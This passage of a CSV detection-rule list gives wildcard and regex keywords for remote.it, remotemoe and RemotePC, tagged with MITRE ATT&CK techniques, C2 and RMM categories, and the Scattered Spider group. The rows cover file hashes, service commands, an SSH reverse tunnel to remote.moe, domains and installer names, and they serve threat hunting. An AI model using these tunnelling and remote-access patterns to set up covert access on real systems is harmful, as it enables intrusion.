"*f52084516dff0a54b9cb0d8c8ab961db1154ceb43261257e7ea4e57cef4c1991*",".{0,1000}f52084516dff0a54b9cb0d8c8ab961db1154ceb43261257e7ea4e57cef4c1991.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f53253575b70dfd206586899b6de357f5288ddfae0e4bbc54f7804f01719cb76*",".{0,1000}f53253575b70dfd206586899b6de357f5288ddfae0e4bbc54f7804f01719cb76.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f5e53a8f6aa666cbbe9c0a0bebd9e0f1315e7e9f9348cb4a341602c14b2943f9*",".{0,1000}f5e53a8f6aa666cbbe9c0a0bebd9e0f1315e7e9f9348cb4a341602c14b2943f9.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f6363909101b64b4aeea40fcd365e4d71e70a5f01bf980670309a5650bbd9254*",".{0,1000}f6363909101b64b4aeea40fcd365e4d71e70a5f01bf980670309a5650bbd9254.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f6b7b1c1dcdd6609fdee89557038818bae31850094b18614529e080383b8c5f4*",".{0,1000}f6b7b1c1dcdd6609fdee89557038818bae31850094b18614529e080383b8c5f4.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f84ef28bd00757a3e609bddd4e1267d8d0adbc25d3014bf291f3924139900c65*",".{0,1000}f84ef28bd00757a3e609bddd4e1267d8d0adbc25d3014bf291f3924139900c65.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f8d92121ac270672a940549d33b12b35414ddc844de5a56874b567bccd607b94*",".{0,1000}f8d92121ac270672a940549d33b12b35414ddc844de5a56874b567bccd607b94.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f8fab0f7fdafeea49e8d33a69185144d1116fe95ec89ce8b0ae7ad7cab21c70e*",".{0,1000}f8fab0f7fdafeea49e8d33a69185144d1116fe95ec89ce8b0ae7ad7cab21c70e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*f905a60a79e8e34f9a747703c5a34aacd35ef8fe07cef2dd4caf2f2f332f419e*",".{0,1000}f905a60a79e8e34f9a747703c5a34aacd35ef8fe07cef2dd4caf2f2f332f419e.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" 
"*f9f02edbb1ce8805f22db9c97cf582d93bffe67fd4fbdddd67ebef132a8f46e8*",".{0,1000}f9f02edbb1ce8805f22db9c97cf582d93bffe67fd4fbdddd67ebef132a8f46e8.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*fb5f40bd41ffd98ff11efcc9afe2f431699c372b8806df096d7270cd5eae06a5*",".{0,1000}fb5f40bd41ffd98ff11efcc9afe2f431699c372b8806df096d7270cd5eae06a5.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*fc80434203f482e80c4dd8f509a5ad4dae149a62399366b45b285ba4577e7cb7*",".{0,1000}fc80434203f482e80c4dd8f509a5ad4dae149a62399366b45b285ba4577e7cb7.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*fcb77da2f09a0fef3c5c97c9aeec535a92977beab31fe315cdc5fd855f964fcd*",".{0,1000}fcb77da2f09a0fef3c5c97c9aeec535a92977beab31fe315cdc5fd855f964fcd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","#filehash","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*fde10089445a9891714b268d69ec4de5b5457ed084fe091cdadb23c9b432c271*",".{0,1000}fde10089445a9891714b268d69ec4de5b5457ed084fe091cdadb23c9b432c271.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*fefb2b5bc41354345598c2f69090bf16f7f1add348fa6a4bad60dd8fb0e73d40*",".{0,1000}fefb2b5bc41354345598c2f69090bf16f7f1add348fa6a4bad60dd8fb0e73d40.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#filehash","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*https://link.remote.it/support/rpi-linux-quick-install*",".{0,1000}https\:\/\/link\.remote\.it\/support\/rpi\-linux\-quick\-install.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*Please wait while we stop the Remote.It system service*",".{0,1000}Please\swait\swhile\swe\sstop\sthe\sRemote\.It\ssystem\sservice.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*Program Files\remoteit-bin*",".{0,1000}Program\sFiles\\remoteit\-bin.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*remot3.it, Inc*",".{0,1000}remot3\.it,\sInc.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","0","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*remote.it.developertoolsHW9iHnd*",".{0,1000}remote\.it\.developertoolsHW9iHnd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*remoteit/installer*",".{0,1000}remoteit\/installer.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*remoteit/remoteit-agent*",".{0,1000}remoteit\/remoteit\-agent.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","1","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*remoteit-amd64-installer.deb*",".{0,1000}remoteit\-amd64\-installer\.deb.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*remoteit-installer.exe*",".{0,1000}remoteit\-installer\.exe.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/desktop","1","1","N/A","N/A","10","10","39","10","2024-08-27T01:12:50Z","2019-01-12T00:59:20Z" "*systemctl enable connectd*",".{0,1000}systemctl\senable\sconnectd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*systemctl start connectd_schannel*",".{0,1000}systemctl\sstart\sconnectd_schannel.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "*systemctl stop connectd_schannel*",".{0,1000}systemctl\sstop\sconnectd_schannel.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","N/A","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z" "* ssh -R* remote.moe*",".{0,1000}\sssh\s\-R.{0,1000}\sremote\.moe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*.config/systemd/user/remotemoe.service*",".{0,1000}\.config\/systemd\/user\/remotemoe\.service.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*/remotemoe.git*",".{0,1000}\/remotemoe\.git.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software 
daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*159.69.126.209*",".{0,1000}159\.69\.126\.209.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*69bc5a68959f7b47ac43810dbe782723eca56101d4bb60533a78530ac1ba23b1*",".{0,1000}69bc5a68959f7b47ac43810dbe782723eca56101d4bb60533a78530ac1ba23b1.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","#filehash","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*7k3j6g3h67l23j345wennkoc4a2223rhjkba22o77ihzdj3achwa.remote.moe*",".{0,1000}7k3j6g3h67l23j345wennkoc4a2223rhjkba22o77ihzdj3achwa\.remote\.moe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*92c70b09d49bef20ae730c579e125f4f7c66d85ef2249c77694f0066a3156b26*",".{0,1000}92c70b09d49bef20ae730c579e125f4f7c66d85ef2249c77694f0066a3156b26.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","#filehash","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*df1b9ddfb57a7fa9b93b250a689e392171764364ff929a701e7a2df763904b78*",".{0,1000}df1b9ddfb57a7fa9b93b250a689e392171764364ff929a701e7a2df763904b78.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","#filehash","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*dummy.remote.moe*",".{0,1000}dummy\.remote\.moe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*fasmide/remotemoe*",".{0,1000}fasmide\/remotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having 
to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*http://*.remote.moe/*",".{0,1000}http\:\/\/.{0,1000}\.remote\.moe\/.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*https://*.remote.moe/*",".{0,1000}https\:\/\/.{0,1000}\.remote\.moe\/.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*infrastructure/remotemoe.service*",".{0,1000}infrastructure\/remotemoe\.service.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","1","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*systemctl restart remotemoe*",".{0,1000}systemctl\srestart\sremotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc 
services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*systemctl start remotemoe*",".{0,1000}systemctl\sstart\sremotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*systemctl status remotemoe*",".{0,1000}systemctl\sstatus\sremotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*systemctl stop remotemoe*",".{0,1000}systemctl\sstop\sremotemoe.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "*systemctl --user start 
remotemoe.service*",".{0,1000}systemctl\s\-\-user\sstart\sremotemoe\.service.{0,1000}","greyware_tool_keyword","remotemoe","remotemoe is a software daemon for exposing ad-hoc services to the internet without having to deal with the regular network stuff such as configuring VPNs - changing firewalls - or adding port forwards","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/fasmide/remotemoe","1","0","N/A","N/A","10","10","274","30","2024-06-03T14:00:47Z","2020-06-11T07:41:03Z" "* /f /im RemotePCS*",".{0,1000}\s\/f\s\/im\sRemotePCS.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* create RPCService start=*",".{0,1000}\screate\sRPCService\sstart\=.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* create ViewerService start=auto*",".{0,1000}\screate\sViewerService\sstart\=auto.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -i remotepc.deb*",".{0,1000}\s\-i\sremotepc\.deb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* RemotePC.exe*",".{0,1000}\sRemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* RemotePCAttendedService *",".{0,1000}\sRemotePCAttendedService\s.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* remotepclauncher.exe*",".{0,1000}\sremotepclauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* remotepcuiu.exe*",".{0,1000}\sremotepcuiu\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* RemotePCViewer.msi*",".{0,1000}\sRemotePCViewer\.msi.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* rpcdownloader.exe*",".{0,1000}\srpcdownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* rpcperfviewer.exe*",".{0,1000}\srpcperfviewer\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* 
RPCWinXP.exe*",".{0,1000}\sRPCWinXP\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*""RemotePCAttendedService""*",".{0,1000}\""RemotePCAttendedService\"".{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.remotepc.com*",".{0,1000}\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.remotepc.com*",".{0,1000}\.remotepc\.com.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","network","10","10","N/A","N/A","N/A","N/A" "*/AttendedUDP.zip*",".{0,1000}\/AttendedUDP\.zip.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/remotepc.deb*",".{0,1000}\/remotepc\.deb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/remotepc.deb*",".{0,1000}\/remotepc\.deb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RemotePC.exe*",".{0,1000}\/RemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RemotePC.exe*",".{0,1000}\/RemotePC\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RemotePC.lnk*",".{0,1000}\/RemotePC\.lnk.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RemotePC.tmp*",".{0,1000}\/RemotePC\.tmp.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/remotepc-attended.deb*",".{0,1000}\/remotepc\-attended\.deb.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RemotePCAttended.dmg*",".{0,1000}\/RemotePCAttended\.dmg.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*/remotepclauncher.exe*",".{0,1000}\/remotepclauncher\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RemotePCSuite.dmg*",".{0,1000}\/RemotePCSuite\.dmg.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/remotepcuiu.exe*",".{0,1000}\/remotepcuiu\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RemotePCViewer.msi*",".{0,1000}\/RemotePCViewer\.msi.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC Remote administration tool","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://remotepc.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/RpcDND_Console.exe*",".{0,1000}\/RpcDND_Console\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.remotedesktop.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/rpcdownloader.exe*",".{0,1000}\/rpcdownloader\.exe.{0,1000}","greyware_tool_keyword","RemotePC","RemotePC RMM tool - abused by attackers","T1021 - T1071 - 